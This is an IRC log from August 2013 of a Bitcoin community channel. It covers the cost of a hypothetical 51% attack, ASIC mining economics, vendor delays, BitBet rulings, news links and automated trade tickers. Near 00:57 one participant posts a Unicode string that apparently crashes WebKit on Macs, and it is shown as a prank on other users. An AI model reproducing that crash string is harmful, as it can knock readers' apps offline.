mircea_popescu: ok, basically, i suppose state actors have the most resources, and can centralize mining if they wished ... Aug 30 00:03:48 the only way to make miners on your system is to buy parts made by corps. Aug 30 00:03:59 this is a huge difference, Aug 30 00:04:15 Avalon update https://bitcointalk.org/index.php?topic=177827.msg3038356#msg3038356 Aug 30 00:04:17 mircea_popescu: they still have to buy chips made by corps now? Aug 30 00:04:21 fractal nope. Aug 30 00:04:22 bfl/avalon/etc Aug 30 00:04:28 you can just make your own. Aug 30 00:04:29 mircea_popescu: I can fab my own chips at home? Aug 30 00:04:33 not at home. Aug 30 00:04:37 fractal: you are advocationg cpu mining with a sata and ram? I just want to clarify Aug 30 00:04:40 but you CAN fab your own chip. Aug 30 00:04:49 you CAN'T fab your own hdd+ ram+etc for a "normal computer" Aug 30 00:05:06 mircea_popescu: you need more resources to do that. only a handful of entities can afford it Aug 30 00:05:07 the entire thing is a ploy to try and take some control back from the people. Aug 30 00:05:08 my spelling sucks btw, last time I will say that Aug 30 00:05:37 let's consider a similar case. if the 3d printer people could print guns Aug 30 00:05:51 this would be equivalent to saying "let's change death so that people no longer can get killed by projectiles" Aug 30 00:06:01 dude... it's clearly your attempt to anull 3d printing. Aug 30 00:06:20 jborkl: no, just saying it would be better if no single entity could have an easy time manufacuring chips that could attack the network..... i.e. its easy for Intel to make 1Th/sec chips and own 50% right away.... but its hard for a signle entitity to buy and setup 250,000 computers mining in a warehouse to own 50% right away Aug 30 00:06:32 I thing killing everyone so they cant die fits better Aug 30 00:06:37 [BTCTC] [LABCOIN] 125 @ 0.003698 = 0.4623 BTC [-] Aug 30 00:06:39 [BTCTC] [LABCOIN] 656 @ 0.0037 = 2.4272 BTC [+] Aug 30 00:06:41 dub lol or that. Aug 30 00:06:41 the space / resource requirements of full computer mining make it harder to own the network Aug 30 00:06:55 fractal do the math. what'd it take intel to 50% the network right now ? Aug 30 00:07:10 ;;nethash Aug 30 00:07:11 613384.094317 Aug 30 00:07:12 600th Aug 30 00:07:18 mircea_popescu: $5 mil. tops. Aug 30 00:07:18 are we forgetting the reason nobody wants to get 50% of the network? Aug 30 00:07:20 ok 614th Aug 30 00:07:27 they need a 620 TH run delivered this second, or else a 1.2Ph run delivered in a coupla months. Aug 30 00:07:31 no i mentioned it earlier dub Aug 30 00:07:36 i tjhink you need to do the math harder. Aug 30 00:07:42 $5mn is not even proof of concept, at intel. Aug 30 00:07:49 dub yes. Aug 30 00:08:14 [BTCTC] [RSM] 1 @ 0.0147 BTC [-] Aug 30 00:08:20 They would probably spend 50m to get the masks and designs ready Aug 30 00:08:20 good Aug 30 00:08:35 mircea_popescu: their chips would be 10TH/sec each on 14nm. they'd need 70 chips. Aug 30 00:08:36 yes, the budget for all this is easily half a bn. Aug 30 00:08:39 not including lost time on other projects Aug 30 00:08:48 fractal you don't know so much about chips, do you ? Aug 30 00:08:52 what 10th/s. Aug 30 00:08:54 ok yall getting trolled Aug 30 00:09:13 14nm is MAYBE 3x as efficient per gram of silicon as 28nm. Aug 30 00:09:24 maybe. if you get lucky with your resonances. Aug 30 00:09:50 Cointerra is doing 500Gh/chip. 14nm would be around 4 times more efficient, so 2TH, but they have smarter engineers who could fit the logic better on the silicon and unroll more cores. Aug 30 00:09:59 fractal dude get serious. Aug 30 00:10:01 even with 2TH chips. thats only 350 Chips. Aug 30 00:10:11 2th chips ? Aug 30 00:10:14 we' Aug 30 00:10:19 re currently at 1watt/gh. Aug 30 00:10:20 wtf are 2 th chips? Aug 30 00:10:32 babby's first troll Aug 30 00:10:37 your 2th chips eat what, 500 watts per chip ? wehat is this, 1955 ? Aug 30 00:10:55 mircea_popescu: Cointerra is claming 500Gh chips. Aug 30 00:11:07 fractial, why isn't someone 51%ing the chain right now? Aug 30 00:11:10 ok, im claiming i have a miniaturized woman that's 2 inches tall and shits little diamonds. Aug 30 00:11:24 they're on 28nm. i think intel could do better... 2TH at 14nm. Aug 30 00:11:26 ok, i'm in now Aug 30 00:11:26 Cinderella? Aug 30 00:12:03 mircea_popescu: I dunno, their CEO was a samgsumg lead designer -- he sounds credible Aug 30 00:12:14 why isn't someone 51%ing the chain right now? Aug 30 00:12:15 so, they will spend 1 billion by the time they get done fucking around Aug 30 00:12:27 and destroy the network and get 0 back Aug 30 00:12:38 no, they won't spend anything -- its not like they're going to pay themselves for the chip mask Aug 30 00:12:51 jborkl: they wouldn't destroy the network, Aug 30 00:13:02 nevermind you do not understand Aug 30 00:13:29 haha Aug 30 00:13:30 understand what? I just said Intel could own 50% hashrate fairly easily Aug 30 00:13:39 can't belive what sort of shitstorm i caused ;) Aug 30 00:13:40 lol Aug 30 00:13:42 ya, but you're wrong. Aug 30 00:13:42 cuz chip masks dont cost anything, they just charge for em to be mean Aug 30 00:14:10 ThickAsThieves: making a bitcoin chip would be a drop in Intel's R&D bucket Aug 30 00:14:19 why isn't someone 51%ing the chain right now? Aug 30 00:14:30 sry i'm breaking channel rules Aug 30 00:14:34 ok, I am out of here- my head is going to explode Aug 30 00:14:49 kinda lulzy shit. Aug 30 00:15:00 and I am going to go pick up a free chip mask at AMD on the way home Aug 30 00:15:08 incredible how complex bitcoin really is. no wonder so many people try to prey on the innocent. Aug 30 00:15:25 mircea_popescu: they'd only have to make a couple hundred chips at 14nm Aug 30 00:15:41 aww you arent even gonna try to answer? Aug 30 00:15:47 the only way Intel would try to 51% attack the bitcoin network is by being forced to do it. it means a lot of lost money on other projects for no gain Aug 30 00:16:04 they wouldn't attack it, they'll mine and make profit Aug 30 00:16:05 process size isn't everything anyway Aug 30 00:16:13 fractal no dude. they would need, if they are starting right now, about half a billion in costs. Aug 30 00:16:22 there's no way they can justify half a bn of expenditure. Aug 30 00:16:23 intel would likely beat other chips by doing it properly, not by doing it smaller Aug 30 00:16:24 that's that. Aug 30 00:16:38 they wouldn't attack it, they'll mine and make profit <<<< you realize this dismantles your points right? Aug 30 00:16:40 [BTCTC] [BASIC-MINING] 9 @ 0.186 = 1.674 BTC [-] Aug 30 00:16:59 ThickAsThieves he seems in gmaxwell nonthink mode. Aug 30 00:17:01 [BTCTC] [BASIC-MINING] 10 @ 0.1837 = 1.837 BTC [-] Aug 30 00:17:06 trapped in* Aug 30 00:17:14 sha256 is power dense, it just isn't possible to throw 4x more transistors into the same space Aug 30 00:17:18 [BTCTC] [BASIC-MINING] 4 @ 0.1826 = 0.7304 BTC [-] Aug 30 00:17:23 mircea_popescu: really? thats way more then I thought... Cointerra and others are rumoured to be spending $5M on masks for their 28nm chips.... I never thought it would be such a big jump from $5M to $500M for 14nm... crazy...!!!! Aug 30 00:17:30 who knew? Aug 30 00:17:30 i've rarely met people capable of making others stupid just through contact, like gmaxwell is. some talent. Aug 30 00:17:32 GPUs are already hitting the power wall Aug 30 00:17:44 [BTCTC] [BASIC-MINING] 8 @ 0.1825 = 1.46 BTC [-] Aug 30 00:17:59 they wouldn't attack it, they'll mine and make profit <<<< this is bitcoin working as intended Aug 30 00:18:06 [BTCTC] [ASICMINER-PT] 1 @ 2.837 BTC [-] Aug 30 00:18:11 here's another point Aug 30 00:18:12 ThickAsThieves: of course! Aug 30 00:18:12 fractal you're confusing a) shoestring operations with intel and b) cointerra wityh someone that matters. Aug 30 00:18:18 [BTCTC] [ASICMINER-PT] 1 @ 2.837 BTC [-] Aug 30 00:18:43 what costs 100k to make on b row costs 10mn to make in hollywood. simply how these things work. Aug 30 00:18:46 if they do all this, and mine 49%, what about tha halving Aug 30 00:18:53 and halving after that Aug 30 00:18:59 where's furuknap Aug 30 00:19:05 mircea_popescu: I thinking is that that Intel is full of smart people, and they'd be able to build it for much less then $500mm.... I could be wrong, of course. Aug 30 00:19:37 corporations spend in a certain way Aug 30 00:19:46 this is why start-ups compete with them, and successfully. Aug 30 00:20:00 this is why our miners are asicminer and bitfury not intel and samsung. Aug 30 00:20:34 http://www.intel.com/content/www/us/en/intelligent-systems/intel-technology/sha-256-implementations-paper.html Aug 30 00:20:45 ^last year, they were here Aug 30 00:21:03 why do corporations spend like that? wouldn't it be better if they became their own competition, instead of spending more to acquire competition when it pops up? Aug 30 00:21:21 fractal not really. they're one thing, not all things. Aug 30 00:21:50 "why do ocean liners work like ocean liners, rather than like salvage boats ? wouldn't it be better if they were salvage boats themselves, rather than dump salvage boats on the ocean when needed ?" Aug 30 00:21:51 interesting link jurov Aug 30 00:21:54 "HashFast’s Golden Nonce GN ASIC successfully taped-out yesterday, Wednesday the 28th, and has been released for 28nm fabrication to a well-known, leading-edge foundry. More details will follow in next week’s joint press release. https://hashfast.com/tapeout/" Aug 30 00:22:09 bleeding-edge now became leading-edge ? Aug 30 00:22:33 ThickAsThieves drop them a bitbet link see what they say >D Aug 30 00:23:04 http://blockchain.info/charts/hash-rate << this fucking graph is mind boggling Aug 30 00:23:04 someone already has that job ;) Aug 30 00:23:07 Bitcoin Hash Rate Aug 30 00:23:51 This mining unit contains one HashFast Golden Nonce (GN) 28nm ASIC chip that performs 400 Ghash/s Aug 30 00:24:26 so what will this chart look like in 1 year ythink? Aug 30 00:24:31 mircea_popescu: I'm pretty confident that someone will make a 14nm chip that does over 2Th/sec ... care to make a BitBet on it?? ;) Aug 30 00:24:32 same. Aug 30 00:24:39 fractal go for it. Aug 30 00:24:39 btw mircea_popescu, about the bitfury bet... if those 5 deliveries (25gh unit and 400gh unit) both get delivered this month (total 5 deliveries atleast), is the bet "yes"? Aug 30 00:24:52 malaimo matuszed MCM-Mike Menoetius midnightmagic MiningBuddy- mircea_popescu mitty mius mixdio mjr_ mod6 mpexbot Aug 30 00:25:00 Anduck more likely to be a yes than if they don't get delivered. Aug 30 00:25:01 is there a ruling about that yet i was wondering Aug 30 00:25:13 but is there anything that bet can fall after that? Aug 30 00:25:14 ;;calc 70*1.02^365 Aug 30 00:25:14 Error: Something in there wasn't a valid number. Aug 30 00:25:22 ;;calc 70*1.02**365 Aug 30 00:25:22 96418.5804376 Aug 30 00:25:23 i dont think they rule til its time Aug 30 00:25:44 if 2% per day Aug 30 00:25:58 ;;nethash Aug 30 00:25:58 613384.094317 Aug 30 00:26:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.02638 BTC [+] Aug 30 00:26:16 ;;calc 613384*1.02**365 Aug 30 00:26:16 844880207.759 Aug 30 00:26:21 lol Aug 30 00:26:32 put all-time and log scale on that chart and this year's growth doesn't look all that extraordinary Aug 30 00:26:49 toffoo it does if you know what log means :) Aug 30 00:27:29 https://bitcointalk.org/index.php?topic=264758.msg3038516#msg3038516 here we go Aug 30 00:27:34 EVE Bitcoin Corp Aug 30 00:28:16 [BTCTC] [ASICMINER-PT] 1 @ 2.775 BTC [-] Aug 30 00:28:18 [BTCTC] [ASICMINER-PT] 1 @ 2.839 BTC [+] Aug 30 00:28:19 [BTCTC] [ASICMINER-PT] 1 @ 2.84 BTC [+] Aug 30 00:28:20 [BTCTC] [ASICMINER-PT] 3 @ 2.842 = 8.526 BTC [+] Aug 30 00:28:21 [BTCTC] [ASICMINER-PT] 1 @ 2.843 BTC [+] Aug 30 00:28:22 [BTCTC] [ASICMINER-PT] 1 @ 2.849 BTC [+] Aug 30 00:28:23 [BTCTC] [ASICMINER-PT] 1 @ 2.85 BTC [+] Aug 30 00:28:25 [BTCTC] [ASICMINER-PT] 1 @ 2.85 BTC [+] Aug 30 00:30:19 i wonder if Steam will carry BTCT one day Aug 30 00:30:27 lol Aug 30 00:31:28 they're perfect for btc Aug 30 00:31:33 [HAVELOCK] [AM100] 7 @ 0.025801 = 0.1806 BTC [+] Aug 30 00:32:30 time for some fun news Aug 30 00:32:59 http://www.washingtonpost.com/world/national-security/black-budget-summary-details-us-spy-networks-successes-failures-and-objectives/2013/08/29/7e57bb78-10ab-11e3-8cdd-bcdc09410972_story.html Aug 30 00:33:01 ‘Black budget’ summary details U.S. spy network’s successes, failures and objectives - The Was Aug 30 00:33:14 "The $52.6 billion “black budget” for fiscal 2013, obtained by The Washington Post from former intelligence contractor Edward Snowden, maps a bureaucratic and operational landscape that has never been subject to public scrutiny. " Aug 30 00:33:29 http://www.theverge.com/2013/8/29/4672524/blood-worms-infest-oklahoma-towns-water-supply Aug 30 00:33:31 Blood worms infest Oklahoma town's tap water | The Verge Aug 30 00:33:33 "THE CHLORINE WON'T KILL THEM, THE BLEACH WON'T KILL THEM." Aug 30 00:33:50 http://www.polygon.com/2013/8/29/4667470/the-strange-case-of-ouyas-free-the-games-fund Aug 30 00:33:53 Kickstarter responds to the strange case of Ouya's Free the Games program | Polygon Aug 30 00:34:32 "Dear Kickstarter, .... A good number of our backer profiles have no previous Kickstarter history. These profiles joined in July/August 2013, and have profile pictures of famous celebrities instead of real people. I previously reached out to Amazon Payments for clarification and they suggested I get in touch with you." Aug 30 00:35:03 "Kickstarter: Hi Sam,Thanks for writing in, and congratulations on the success of your project! If you'd like to know more about backers who have found your project, you can always take a look at their profile to get a better feel for them. " Aug 30 00:35:12 kickstarter run by robots? Aug 30 00:35:27 http://www.usatoday.com/story/news/nation/2013/08/29/justice-medical-marijuana-laws/2727605/?csp=breakingnews Aug 30 00:35:30 Justice Dept. won't challenge state marijuana laws Aug 30 00:35:46 "The Justice Department will not attempt to challenge state laws that allow for the medical and recreational use of marijuana as long as the drug sales do not conflict with eight new federal enforcement priorities." Aug 30 00:35:49 [BTCTC] [DMS.SELLING] 53 @ 0.01258 = 0.6667 BTC [+] Aug 30 00:35:49 [BTCTC] [DMS.SELLING] 947 @ 0.01259 = 11.9227 BTC [+] Aug 30 00:36:15 no link to the 8, sorry Aug 30 00:36:26 http://bigstory.ap.org/article/judge-nfl-players-settle-concussion-lawsuits Aug 30 00:36:28 NFL to pay $765M to settle concussion lawsuits Aug 30 00:36:40 "The NFL has agreed to spend close to $800 million to diagnose and compensate potentially thousands of retired players who develop dementia and other brain disorders they blame on the violent, bone-crunching collisions that pro football has long celebrated in its highlight reels." Aug 30 00:37:33 TaT I think you would like a website called Fark.com :P Aug 30 00:38:21 Are bitbet rulings made right after the resolution cut-off? Aug 30 00:38:31 or sometime between the bet closing and resolution date/time Aug 30 00:38:33 ? Aug 30 00:38:51 there's some disease that causes ppl to turn into aggregator bots? Aug 30 00:39:11 mircea_popescu: are you the sole decider for bitbet resolutions? Aug 30 00:39:12 fractal: there's some grace periods, hours to days Aug 30 00:39:32 we don't know im a decider at all. Aug 30 00:39:43 i'm just part owner. Aug 30 00:39:46 sorry jurov Aug 30 00:39:58 ThickAsThieves: np, just joking a bit Aug 30 00:40:03 the resolution time is when the bet is actually resolved. Aug 30 00:40:48 i could weave in some porn links if you are feeling nostalgic :) Aug 30 00:40:59 mircea_popescu: how do the deciders decide ;)... do they read the discussion on the page? Aug 30 00:41:07 http://letstalkbitcoin.com/satoshi-square-an-homage-to-wall-st/#.Uh-_2RtvOXs Aug 30 00:41:10 Satoshi Square: the BTC Wall St. | Lets Talk Bitcoin Aug 30 00:41:20 that's nopt porn! Aug 30 00:41:38 fractal i suspect they massacre goats. Aug 30 00:41:50 [BTCTC] [TAT.ASICMINER] 37 @ 0.02638 = 0.9761 BTC [+] Aug 30 00:42:16 haha.. right. Aug 30 00:42:55 http://www.reddit.com/r/Bitcoin/comments/1lc3is/pulled_article_from_tgb_5m_seizures_provide/ Aug 30 00:42:58 Pulled Article from TGB: $5M Seizures Provide Insight To Mt.Gox Liquidity : Bitcoin Aug 30 00:42:59 mircea_popescu: has there ever been a case there the wording is too vague to decide and the coins were returned back to their owners? Aug 30 00:43:02 https://bitcointalk.org/index.php?topic=192916.msg3033196#msg3033196 Aug 30 00:43:09 Liquid Synergy Designs Inc. -ASIC mining hardware Aug 30 00:43:15 [BTCTC] [LABCOIN] 65 @ 0.003588 = 0.2332 BTC [-] Aug 30 00:43:16 [BTCTC] [LABCOIN] 9 @ 0.003587 = 0.0323 BTC [-] Aug 30 00:43:17 mircea, there you go Aug 30 00:43:17 [BTCTC] [LABCOIN] 76 @ 0.003587 = 0.2726 BTC [-] Aug 30 00:43:57 fractal, there were some returs, hard to say if due to wording Aug 30 00:44:50 fractal nope. the idea is that if the wording is too vague people don't bet. Aug 30 00:44:59 do you know which ones were returned? Aug 30 00:45:18 it's in the faq tho Aug 30 00:46:20 "Bets can indeed be cancelled, but only if BitBet judges that material changes make the bet meaningless. " Aug 30 00:46:25 jborkl they got a massive problem on their hands. Aug 30 00:46:30 has that happened before? Aug 30 00:46:41 [BTCTC] [ACTIVEMINING] 12 @ 0.004471 = 0.0537 BTC [-] Aug 30 00:46:42 [BTCTC] [ACTIVEMINING] 50 @ 0.00447 = 0.2235 BTC [-] Aug 30 00:46:43 suppose people want refunds enough for a batch and a half. what then ? they refund one bach onl;y, as the 2nd isn't whole. Aug 30 00:46:44 [BTCTC] [ACTIVEMINING] 3 @ 0.004448 = 0.0133 BTC [-] Aug 30 00:46:45 [BTCTC] [ACTIVEMINING] 145 @ 0.004433 = 0.6428 BTC [-] Aug 30 00:46:46 [BTCTC] [ACTIVEMINING] 470 @ 0.004432 = 2.083 BTC [-] Aug 30 00:46:47 [BTCTC] [ACTIVEMINING] 110 @ 0.00443 = 0.4873 BTC [-] Aug 30 00:46:48 [BTCTC] [ACTIVEMINING] 50 @ 0.004426 = 0.2213 BTC [-] Aug 30 00:46:48 [BTCTC] [ACTIVEMINING] 200 @ 0.004425 = 0.885 BTC [-] Aug 30 00:46:49 [BTCTC] [ACTIVEMINING] 5 @ 0.004381 = 0.0219 BTC [-] Aug 30 00:46:50 [BTCTC] [ACTIVEMINING] 20 @ 0.00438 = 0.0876 BTC [-] Aug 30 00:46:51 [BTCTC] [ACTIVEMINING] 12 @ 0.004366 = 0.0524 BTC [-] Aug 30 00:46:52 [BTCTC] [ACTIVEMINING] 50 @ 0.004365 = 0.2183 BTC [-] Aug 30 00:46:53 [BTCTC] [ACTIVEMINING] 125 @ 0.00436 = 0.545 BTC [-] Aug 30 00:46:54 [BTCTC] [ACTIVEMINING] 500 @ 0.004359 = 2.1795 BTC [-] Aug 30 00:46:55 [BTCTC] [ACTIVEMINING] 62 @ 0.004356 = 0.2701 BTC [-] Aug 30 00:46:56 [BTCTC] [ACTIVEMINING] 250 @ 0.004355 = 1.0888 BTC [-] Aug 30 00:46:57 [BTCTC] [ACTIVEMINING] 1946 @ 0.00416 = 8.0954 BTC [-] Aug 30 00:47:14 fractal i think it happened once or twice, there was some bet about some sporting event or pageant or w/e that got cancelled. Aug 30 00:47:16 [BTCTC] [ACTIVEMINING] 14 @ 0.00416 = 0.0582 BTC [-] Aug 30 00:47:29 ah ok... Aug 30 00:47:58 jurov: I had a friend who was close to ordering 10K chips from avalon -- i convinced him not to due to uncertainty, and that their batch1 and batch2 were late Aug 30 00:48:10 he owes me a few drinks ;) Aug 30 00:48:19 bitsyncom is a asshat Aug 30 00:48:32 its just terrible customer service Aug 30 00:48:34 somebody with more hardware knowledge than me : wtf are the holes http://i.imgur.com/oLiVXmJ.jpg ? Aug 30 00:48:39 they can't be mounts can they ?! Aug 30 00:48:49 yes. screws Aug 30 00:49:03 what the fuck is this paranoia. what are they anchoring it against, hurricane force winds ? Aug 30 00:49:14 haha Aug 30 00:49:20 fan mounts? Aug 30 00:49:43 Duffer1 they're keeping the battery cool ? Aug 30 00:49:57 well, you can screw whatever you want to/against it Aug 30 00:49:58 heat sink mounts in the middle Aug 30 00:50:00 o o o i see Aug 30 00:50:03 aha, makes sense Aug 30 00:50:25 [BTCTC] [ACTIVEMINING] 1 @ 0.0043 BTC [+] Aug 30 00:50:26 [BTCTC] [ACTIVEMINING] 184 @ 0.004161 = 0.7656 BTC [-] Aug 30 00:50:28 [BTCTC] [ACTIVEMINING] 738 @ 0.00416 = 3.0701 BTC [-] Aug 30 00:50:29 [BTCTC] [ACTIVEMINING] 1182 @ 0.004151 = 4.9065 BTC [-] Aug 30 00:50:30 [BTCTC] [ACTIVEMINING] 95 @ 0.00415 = 0.3943 BTC [-] Aug 30 00:50:36 what i dont get, is why anyone would spend money after batch 1 Aug 30 00:50:38 uhh im pretty sure the heatsink goes on the back -- just like aalon units Aug 30 00:50:50 ThickAsThieves: batch 2 ROI in BTC terms... batch 3 did not Aug 30 00:50:54 that disclaimer pretty much told you you were gonna get fucked Aug 30 00:51:06 oh, the 'no bullshit' disclaimer? Aug 30 00:51:10 yeah Aug 30 00:51:22 i must agree, steamboat is handling tyhings pretty well considering. Aug 30 00:51:32 they delivered sucessfully on batch 1 on ROI terms... i guess people took a chance.... batch 3 was a red flag on price from the get-go though Aug 30 00:51:49 fractal yeah. Aug 30 00:52:06 and then people just kept throwing thousands and thousands of coins at them for chips Aug 30 00:52:21 all while the batches were late Aug 30 00:52:38 and being delivered used Aug 30 00:52:50 i sat through flame wars telling n00bs their batch 3 would never ROI Aug 30 00:53:01 where, this ? Aug 30 00:53:34 BTW -- best mining calculator so far -- http://www.btcinvest.net/bitcoin-mining-profit-calculator.php Aug 30 00:53:41 "never ROI" has been a thing since before it was a thing Aug 30 00:53:45 ignores dates and works on diff jumps , which is all that matters Aug 30 00:54:26 the genesisblock calculator is pretty innaccurate as a 'month' could have an unknown number of diff jumps Aug 30 00:54:55 thank you for this Aug 30 00:55:00 I did not say which side the heat sinks sits on- just that was the mount hole for it Aug 30 00:55:01 nice calc Aug 30 00:55:02 no prob... Aug 30 00:56:10 i'm glad they also show you the BTC buy and hold -- most people say stupid things like 'well, if i dont get my entire BTC back, i'll still be up if the exchange rate rises!' Aug 30 00:56:53 while i agree, consider what they mightve done with the coins in their pocket instead... Aug 30 00:57:12 Mircea_Popescu - did you see that bug that basically boots mac users off IRC? Aug 30 00:57:18 so basically you make over infinity time about 4x what you make in the first month. Aug 30 00:57:23 very lulzy Aug 30 00:57:25 jborkl nop Aug 30 00:57:35 they seem to think that spending USD to buy a machine that makes BTC is OK even if it you have less BTC then you'd get if you just bought the BTC itself Aug 30 00:57:39 ThickAsThieves bought xbond at 1.4 ? Aug 30 00:57:51 خ ̷̴̐خخ ̷̴̐خ Aug 30 00:57:53 yeah right Aug 30 00:57:54 fractal it's because they want to be part of the thing. Aug 30 00:58:00 more like labcoin at 40 Aug 30 00:58:12 That crashes the webkit for mac users Aug 30 00:58:28 so we have no mac users here !? Aug 30 00:58:33 bonds are probly the closest thing to a miner hedge around tho Aug 30 00:58:33 mircea_popescu: so, losing money to be 'cool'? makes sense Aug 30 00:58:36 bgupta Aug 30 00:58:36 ;) Aug 30 00:58:50 fractal i'd link you to the article if i actually had a motherfducking blog ;/ Aug 30 00:59:11 still down? Aug 30 00:59:12 lol Aug 30 00:59:16 so amateurish Aug 30 01:00:28 i know i sux Aug 30 01:01:22 the thing i like about this calc http://www.btcinvest.net/bitcoin-mining-profit-calculator.php is that they also show a chart which will help n00bs understand exactly what diminishing returns look like ... i always hear 'oh, i'll just keep this USB Block Erupter going for the next 12 months until it ROIs' Aug 30 01:01:55 asymptotes are fun. Aug 30 01:05:01 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.0008695 = 0.0026 BTC [-] Aug 30 01:05:26 [BTCTC] [TAT.ASICMINER] 5 @ 0.0265 = 0.1325 BTC [+] Aug 30 01:07:24 [BTCTC] [LABCOIN] 67 @ 0.003697 = 0.2477 BTC [+] Aug 30 01:07:40 [BTCTC] [BASIC-MINING] 6 @ 0.1826 = 1.0956 BTC [+] Aug 30 01:07:41 who made it ? Aug 30 01:08:04 not sure... Aug 30 01:08:17 Stefan Teupe Aug 30 01:08:27 but i've been saying that this is the right way to do mining calcs for a while -- just too lazy to have done it myself ;) Aug 30 01:08:29 [BTCTC] [ASICMINER-PT] 1 @ 2.839 BTC [-] Aug 30 01:08:31 [BTCTC] [ASICMINER-PT] 2 @ 2.84 = 5.68 BTC [+] Aug 30 01:08:35 looks like they're starting to learn -- http://www.reddit.com/r/Bitcoin/comments/1lc025/so_today_is_the_day_i_start_mining_with_my_or_or/cbxt3w9 Aug 30 01:08:57 "If I would have taken that same $1500 I spent at that time and just bought bitcoins I would have gotten 214 btc, or in $27500 at current prices, FML" Aug 30 01:09:11 heh Aug 30 01:10:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.02649 BTC [-] Aug 30 01:10:01 [BTCTC] [LABCOIN] 200 @ 0.003592 = 0.7184 BTC [-] Aug 30 01:11:29 well... thats it for me... gotta run Aug 30 01:11:35 goodnight Aug 30 01:11:42 [BTCTC] [DMS.SELLING] 50 @ 0.01246 = 0.623 BTC [-] Aug 30 01:11:44 [BTCTC] [DMS.SELLING] 125 @ 0.01245 = 1.5563 BTC [-] Aug 30 01:11:45 [BTCTC] [DMS.SELLING] 42 @ 0.01245 = 0.5229 BTC [-] Aug 30 01:11:46 [BTCTC] [DMS.SELLING] 10 @ 0.01245 = 0.1245 BTC [-] Aug 30 01:11:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.02649 BTC [-] Aug 30 01:12:00 [BTCTC] [TAT.ASICMINER] 30 @ 0.0265 = 0.795 BTC [+] Aug 30 01:12:19 http://bitbet.us/bet/302/bitcoin-standardized-protocol-approved-this-summer/ >2 btc on the way, yay Aug 30 01:12:24 ;;nethash Aug 30 01:12:25 615935.175325 Aug 30 01:12:25 BitBet - Bitcoin Standardized Protocol Approved this Summer Aug 30 01:13:21 jurov: Has one been approved? Aug 30 01:13:25 was that a project? I thought the bitcoin standard was "bitcoind" for the devs Aug 30 01:13:54 no i voted against. and RFC-style standard is meant, not just code Aug 30 01:14:05 which isn't that wrong. some standards are defined by one piece of source code too Aug 30 01:14:05 *bet, not voted lol Aug 30 01:14:12 Good, I bet against too Aug 30 01:14:45 pankkake: if you need network of interoperating impelmentations, you can't just left it on code Aug 30 01:15:10 maybe devs think so, but that doesn't make it true Aug 30 01:15:20 I haven't even seen any effort at writing such a standard Aug 30 01:15:27 *hanbot* ahh leetal chunk of negativs negated Aug 30 01:16:41 sure, ideally. but I think it's too soon Aug 30 01:16:59 how so? Aug 30 01:17:35 there are still many things that could change, why write a standard? Aug 30 01:17:35 we are just going to throw everything out and build Bitcoin 1.0 . riiiight. Aug 30 01:17:52 are there any other implementations running? Aug 30 01:18:09 well they could standardize some stuff I guess Aug 30 01:18:11 Closest I've seen to a spec is the wiki, and that's full of holes and exceedingly vague in places Aug 30 01:18:18 yes, they try. bitsofproof, libbitcoin, ... Aug 30 01:19:23 and RFCs are amended, too. Aug 30 01:21:11 2012 trilema is back Aug 30 01:21:35 with /dtng/ ? Aug 30 01:21:37 with beautiful php deprecated errors Aug 30 01:22:17 mircea_popescu: /dtng still exists somewhere? Aug 30 01:22:41 polimedia.us/dtng/c/ Aug 30 01:22:42 [HAVELOCK] [XBOND] 1 @ 0.0012 BTC [+] Aug 30 01:22:48 html archive only Aug 30 01:24:04 why only archive? Aug 30 01:27:33 [BTCTC] [ACTIVEMINING] 49 @ 0.0052 = 0.2548 BTC [+] Aug 30 01:28:00 http://polimedia.us/dtng/c/res/16243.html can't do that with bitcoin Aug 30 01:28:02 cyber Aug 30 01:28:13 [BTCTC] [BTC-GROWTH] 1 @ 0.1019 BTC [+] Aug 30 01:28:15 [BTCTC] [BTC-GROWTH] 10 @ 0.102 = 1.02 BTC [+] Aug 30 01:28:20 http://bitbet.us/bet/521/labcoins-own-130nm-design-sample-chips-will-be/#c1307 Aug 30 01:28:23 BitBet - Labcoins own 130nm design sample chips will be received by testers by 12TH SEPT 2013 Aug 30 01:28:25 >Congratulations BitBet on allowing and actively promoting yet another scam bet. Those of you who actually use this betting service run by scammers need your head testing. Aug 30 01:28:33 i think commenting counts as using the service. Aug 30 01:28:35 http://polimedia.us/dtng/b/src/128216887595.jpg sfw. kinda. Aug 30 01:28:41 [BTCTC] [BTC-GROWTH] 2 @ 0.1028 = 0.2056 BTC [+] Aug 30 01:30:01 [BTCTC] [BASIC-MINING] 4 @ 0.1826 = 0.7304 BTC [+] Aug 30 01:30:01 [BTCTC] [BASIC-MINING] 1 @ 0.1823 BTC [-] Aug 30 01:30:03 [BTCTC] [BASIC-MINING] 5 @ 0.1823 = 0.9115 BTC [-] Aug 30 01:30:15 pankkake: reptilia tried to invent redeemable vouchers for this Aug 30 01:30:36 iirc was not very successful Aug 30 01:30:40 there is a printable bitcoin tip service Aug 30 01:32:17 [BTCTC] [DMS.MINING] 59 @ 0.00335 = 0.1977 BTC [-] Aug 30 01:32:59 [BTCTC] [DMS.MINING] 59 @ 0.003395 = 0.2003 BTC [+] Aug 30 01:33:34 [MPEX] [S.MPOE] 6446 @ 0.00087501 = 5.6403 BTC [+] Aug 30 01:33:47 [BTCTC] [DMS.MINING] 248 @ 0.003399 = 0.843 BTC [+] Aug 30 01:41:20 [BTCTC] [LABCOIN] 20 @ 0.003601 = 0.072 BTC [+] Aug 30 01:41:51 [BTCTC] [LABCOIN] 1 @ 0.003601 BTC [+] Aug 30 01:41:52 [BTCTC] [LABCOIN] 8 @ 0.0036 = 0.0288 BTC [-] Aug 30 01:43:20 [BTCTC] [LABCOIN] 1 @ 0.0036 BTC [-] Aug 30 01:44:49 [BTCTC] [LABCOIN] 65 @ 0.003609 = 0.2346 BTC [+] Aug 30 01:45:06 [BTCTC] [LABCOIN] 65 @ 0.003609 = 0.2346 BTC [+] Aug 30 01:45:08 [BTCTC] [LABCOIN] 10 @ 0.003586 = 0.0359 BTC [-] Aug 30 01:45:28 [BTCTC] [LABCOIN] 460 @ 0.003586 = 1.6496 BTC [-] Aug 30 01:45:47 [BTCTC] [LABCOIN] 75 @ 0.003586 = 0.269 BTC [-] Aug 30 01:46:20 [BTCTC] [LABCOIN] 382 @ 0.003589 = 1.371 BTC [+] Aug 30 01:47:10 kakobrekla im pretty sure that if anon says "scammer" many times things happen. Aug 30 01:47:44 i am stil on BFL's mailing list Aug 30 01:47:48 "What's going on with the network difficulty rate? Aug 30 01:47:48 As we continue to ship more product, the majority of the hashrate on the 